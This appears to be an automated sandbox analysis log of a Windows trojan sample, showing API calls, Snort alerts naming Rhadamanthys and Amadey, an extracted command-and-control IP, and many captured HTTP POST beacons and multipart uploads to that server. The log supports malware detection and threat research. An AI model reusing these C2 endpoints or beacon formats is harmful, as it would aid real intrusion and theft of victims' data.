Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Code function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405C49
Source: C:\Users\user\Desktop\J2NWKU2oJi.exe	Code function: 0_2_0040290B FindFirstFileW,	0_2_0040290B

Source: C:\Windows\System32\OpenWith.exe

Code function: 20_3_00007DF4B6388E20 GetLogicalDriveStringsW,

20_3_00007DF4B6388E20

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: C:\Windows\System32\OpenWith.exe	Code function: 4x nop then dec esp		20_3_00007DF4B638BFA1
Source: C:\Windows\System32\OpenWith.exe	Code function: 4x nop then dec esp		20_2_000001BD75700511

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.10.37:2036 -> 192.168.2.4:49736
Source: Traffic	Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.10.37:2036 -> 192.168.2.4:49738
Source: Traffic	Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.10.37:2036 -> 192.168.2.4:49739
Source: Traffic	Snort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49740 -> 91.202.233.180:80
Source: Traffic	Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49741 -> 91.202.233.180:80
Source: Traffic	Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49743 -> 91.202.233.180:80
Source: Traffic	Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49747 -> 91.202.233.180:80
Source: Traffic	Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49748 -> 91.202.233.180:80
Source: Traffic	Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49752 -> 91.202.233.180:80
Source: Traffic	Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49754 -> 91.202.233.180:80
Source: Traffic	Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49757 -> 91.202.233.180:80
Source: Traffic	Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49760 -> 91.202.233.180:80
Source: Traffic	Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49763 -> 91.202.233.180:80
Source: Traffic	Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49767 -> 91.202.233.180:80
Source: Traffic	Snort IDS: 2044597 ET TROJAN Amadey Bot Activity (POST) M1 192.168.2.4:49769 -> 91.202.233.180:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

IPs: 91.202.233.180

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1

Source: global traffic

TCP traffic: 192.168.2.4:49736 -> 94.156.10.37:2036

Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTI=Host: 91.202.233.180Content-Length: 86544Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODkwNDc=Host: 91.202.233.180Content-Length: 89199Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTI0NDU=Host: 91.202.233.180Content-Length: 92597Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTI=Host: 91.202.233.180Content-Length: 86544Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTI=Host: 91.202.233.180Content-Length: 86544Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTI=Host: 91.202.233.180Content-Length: 86544Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTI=Host: 91.202.233.180Content-Length: 86544Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTI=Host: 91.202.233.180Content-Length: 86544Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----OTI0OTQ=Host: 91.202.233.180Content-Length: 92646Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 43 33 45 45 33 35 45 30 35 45 39 36 37 46 32 45 43 37 38 35 39 38 32 42 36 37 39 34 43 37 33 42 32 41 43 42 43 31 37 30 37 42 32 30 33 36 44 41 42 44 41 36 43 33 34 36 43 42 42 34 35 43 31 30 31 32 35 41 39 39 32 30 39 46 36 37 44 38 33 32 36 34 41 35 42 33 45 42 34 45 43 35 42 33 34 42 41 35 42 37 46 39 45 34 32 32 33 45 45 31 36 30 43 34 45 38 35 36 33 31 36 31 38 42 45 35 39 44 35 42 31 46 43 41 30 31 35 36 37 41 43 39 30 39 35 37 33 39 36 44 46 33 Data Ascii: r=C3EE35E05E967F2EC785982B6794C73B2ACBC1707B2036DABDA6C346CBB45C10125A99209F67D83264A5B3EB4EC5B34BA5B7F9E4223EE160C4E85631618BE59D5B1FCA01567AC90957396DF3
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.202.233.180Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /g88sks2SaM/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----ODYzOTY=Host: 91.202.233.180Content-Length: 86548Cache-Control: no-cache
